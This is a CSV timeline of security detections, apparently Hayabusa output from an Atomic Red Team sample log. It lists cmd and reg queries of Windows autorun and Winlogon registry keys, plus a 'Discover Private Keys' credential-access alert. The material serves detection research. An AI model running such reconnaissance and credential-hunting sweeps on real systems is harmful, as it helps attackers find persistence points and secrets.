2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
